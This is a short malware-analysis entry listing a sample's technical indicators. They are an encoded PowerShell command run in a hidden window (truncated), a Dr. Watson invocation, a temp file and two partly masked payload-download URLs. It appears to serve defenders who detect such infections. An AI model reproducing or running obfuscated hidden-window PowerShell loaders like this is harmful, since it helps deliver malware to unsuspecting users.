Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABRAGsAeQBfAHoAYwByAD0AKAAnAE8AagAnACsAKAAnAGIAYQAnACsAJwA0ADQAJwApACsAJwAxACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAdQBzAEUAUgBwAHIAbwBmAEkATABFAFwAaQB4AF8AVQAwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1536
- %TEMP%\1077654.cvr
- http://re######-demo-website.com/discussion/qWWf8FS/
- http://pl#######audesemcarencia.com/erros/JHoq/
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABRAGsAeQBfAHoAYwByAD0AKAAnAE8AagAnACsAKAAnAGIAYQAnACsAJwA0ADQAJwApACsAJwAxACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAdQBzAEUAUgBwAHIAbwBmAEkATABFAFwAaQB4AF8AVQAwA...' (with hidden window)